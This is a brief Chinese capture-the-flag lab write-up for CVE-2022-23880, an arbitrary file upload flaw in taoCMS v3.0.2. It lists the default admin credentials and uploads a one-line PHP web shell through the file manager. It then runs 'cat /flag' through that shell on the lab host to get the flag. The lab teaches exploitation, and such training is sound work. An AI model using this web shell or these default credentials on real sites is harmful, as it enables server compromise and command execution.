春秋云镜 CVE-2022-23880
春秋云镜 CVE-2022-23880 taoCMS v3.0.2 任意文件上传漏洞
靶标介绍
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码;同CVE-2022-25578一套cms。
启动场景
漏洞利用
taoCMS默认账号admin/tao(管理后台F12查看源代码)
文件管理处存在任意文件上传漏洞,进入文件管理,新建shell.php文件。
编辑shell.php文件,写入一句话木马文件。
system($_GET[cmd]);
?>
http://eci-2zeiv4aug0u8eexs6yqa.cloudeci1.ichunqiu.com/shell.php?cmd=cat /flag
得到flag
flag{dabdb0aa-e457-4efc-a408-4e34ac5e098b}
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!